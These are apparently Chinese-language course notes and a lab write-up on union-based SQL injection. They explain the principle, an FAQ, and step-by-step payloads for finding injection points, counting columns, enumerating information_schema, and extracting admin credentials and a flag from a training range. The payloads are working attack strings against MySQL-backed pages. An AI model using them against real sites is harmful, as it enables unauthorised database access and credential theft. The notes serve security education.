web安全入门（第四章-1）SQL注入的原理分析

1、SQL注入本质

注入攻击的本质，是把用户输入的数据当作代码执行

这有两个条件：
第一个是用户能够控制输入
第二个是原本程序要执行的代码，拼接里用户输入的数据然后执行

sql注入就是针对sql语句的注入，也可以理解为用户输入的数据当作sql语句的代码执行了
sql注入是1998年一名叫做rfp的黑客发表的一篇文章让后才进入了大众视线。

2、显错注入靶场的做法

判断注入点
最古老的方法：输入and1=1页面正常
输入and1=2页面不正常

最简单的方法：页面后面加',看是否报错

老师的方法：  如果是数字型传参，可以尝试-1
例如：  http://www.xxx.com/new/php?id=1 页面显示id=1的新闻
http://www.xxx.com/new.php?id=2-1 页面显示id=1的新闻

and 1=1 and 1=2 被拦截的可能性太高了
可以尝试 and -1=-1 and -1=-2 and 1>0 or 1=1
或者直接or sleep(5)

3、分析公开课猫舍注入

显错注入核心-联合查询

联合查询[将两个查询语句结果一起输出]条件：两个查询语句的结果集字段数必须相同
select*from news where id=1
union
select password,username from admin limit
union select 1,2 database()
http://59.63.200.79:8003/?id=1 and 1=2 union select1,2

information_schema.tables 存放表名和库名的对应
information_schema.columns 存放字段名和表名的对应

注: information_schema.tables 实际上是选中information_schema库中的tables表

4、显错注入靶场的做法

MYSQL注入：
判断当前页面字段总数
and 1=1 order by 1,2,3,4,5……
判断显示位
and 1=2 union select 1,2,3,4,5,6,7……
查当前数据库
and 1=2 union select 1,2,database()
查表名
and 1=2 union select 1,2,table_name from information_schema.tables where TABLE_SCHEMA=数据库名 limit 0,1
查列名
and 1=2 Union select 1,2,columns_name from information_schema.COLUMNS where TABLE_NAME=表名 limit 0,1
查字段内容
and 1=2 union select 1,用户名段,密码段 from 表名 limit 0,1

补充：
SQL注入基础-本课易错回答分析

1.sql注入本质是什么
把用户输入当做代码执行

2.sql注入的条件
用户可控输入和原本程序要执行代码，拼接用户输入且当作SQL语句去执行

3.order by的作用及含义
order by 用于判断显示位，order by 原有的作用是对字段进行一个排序，在sql注入中用order by 来判断排序，order by 1就是对一个字段进行排序，如果一共四个字段，你order by 5 数据库不知道怎么排序，于是乎就错误了无返回值

4.union select如何发挥作用
union为联合查询，a联合b进行了查询，为查询了前面的sql语句(原有的)后再进行后面的sq查询(我们添加的)，但两张表联合查询的字段数必须相同。

5.输出位是什么
SQL查询出来的数据不一定全部会输出，页面上只会输出几个字段的信息，那几个会输出的字段就是输出位

6.information_schema是什么
information_schema是mysql的系统自带表，用于查询数据，在mysql5.0以上版本中存在

7.加单引号和加 and 1=2有什么区别
有区别，单引号是为了闭合语句，而and 1=2是为了让union前面的语句无查询结果无输出，然后直接输出拼接进去union后面的那个语句的查询结果

8.and 是什么意思
and 为和的意思，一个语句中，当前一个正确，后一个错误时，如果是and连接整个语句返回是False

9.or是什么意思
Or 为和的意思，一个语句中，当前一个正确，后一个错误时，如果是or连接整个语句返回是True

10.and 和 or 选择使用有什么讲究？
And 语句执行时，如果and 前的语句返回False,那么and后面的语句根本不执行

11.除了单引号外还有其他的符号可以闭合吗？
实际上还是要看源码，常见的是单引号和双引号还有括号

12.limit的作用
limit 在注入中用于排序然后输出，limit a,b a代表了从哪个位置(从0开始) b代表从那位开始显示几条数据

13.可以查讯多个字段内容吗
可以，可以使用语句Group_concat()函数进行输出

14.%23有什么作用
%23编码为#,用于注释后面的语句,防止SQL注入点后原本的SQL语句对SQL注入进行干扰

15.报错注入的原理
利用sql注入拼接sql语句，将报错信息输出时同时将我们想要的信息输出

16.闭合是什么
在sql查询中，代码比较严谨，括号和引号都得成双成对，引号内的默认是字符串不会当作SQL语句执行，所以必须闭合然后才能注入，当然有些SQL语句直接拼接，也就不用什么闭合了

17.SQL注入有数据库限制吗？
没有，常见的数据库都可以

18.SQL注入有动态脚本语言限制吗？
没有限制

19.SQL注入如果没系统自带表怎么办
那就惨了，只能通过猜，不断的尝试，一般而言数据库的表也不会乱起名字，毕竟是团队协作的东西

20.系统自带库管理员不会修改吗？
一般而言并不会

21.union all 和 union 区别
如果输出的数据有相同的，Union只会输出一次，而union all都会输出

22.为什么用and 1=1正常 and 1=2报错来判断是否存在SQL注入
因为如果存在SQL注入，那么and就是和的意思，1=1是一个恒等式，然后因为原本能够查出数据，那么两个真就是True，但是1=2肯定是不可能的，这里就会返回一个False,然后因为和必须两个真才返回True,所以这里拼接就不成立返回False.

自己写的过程：

查看是否存在sql注入
使用古老方法  and 1=1页面正常
and 1=2页面显示错误，说明存在sql注入

查看有几个字段：
order by 1
order by 2
order by 3
order by 4 显示错误，说明有三个字段

找输出点：
union select 1,2,3
结果出现 2，3 说明2，3都可以输出

查询系统自带库:
union select 1,2,table_name from information_schema.tables where table_schema=database()
出现第一个表，在后面加 limit 1,1 获取第二个表

查找字段：
union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='error_flag'
最后得到字段名

找到字段名获取数据：
union select 1,2,flag from error_flag-- '
如果数据flag错误 可以试试limit 0,1/1,1